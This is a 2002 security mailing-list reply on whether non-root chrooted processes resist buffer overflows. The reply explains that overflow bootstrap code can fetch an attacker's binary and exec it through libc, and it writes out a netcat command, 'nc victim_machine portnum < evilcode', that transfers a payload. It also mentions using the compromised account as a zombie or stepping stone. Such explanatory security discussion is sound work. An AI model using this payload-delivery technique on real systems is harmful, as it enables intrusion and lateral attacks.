Vulnerability Development: Re: OT? Are chroots immune to buffer overflows?

["Adam Lydick" <lydickaw () hotmail com>]

Sure it can. Just have the bootstrap code (the overflow) download a binary 
from the attacker's machine:
'nc victim_machine portnum < evilcode'

Then exec the code. All the calls you need are in libc, which is almost 
certainly loaded by the overflowed program. You have a chrooted, local 
account that can still be used as a zombie for attacks or masking your true 
location... (Or as a stepping stone for attacking more powerful accounts / 
machines on the local network)
Adam

> From: Jason Haar <Jason.Haar () trimble co nz>
> To: vuln-dev () securityfocus com
> Subject: OT? Are chroots immune to buffer overflows?
> Date: Wed, 22 May 2002 15:48:16 +1200
>
> [note: my question is WRT non-root chrooted jails - we all know about
> chroot'ing root processes!]
>
> Most buffer overflows I've seen attempt to infiltrate the system enough to
> run /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist 
> -
> so they fail.
>
> Is it as simple as that? As 99.999% of the system binaries aren't available
> in the jail, can a buffer overflow ever work?
>
> --
> Cheers
>
> Jason Haar
>
> Information Security Manager
> Trimble Navigation Ltd.
> Phone: +64 3 9635 377 Fax: +64 3 9635 417



_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com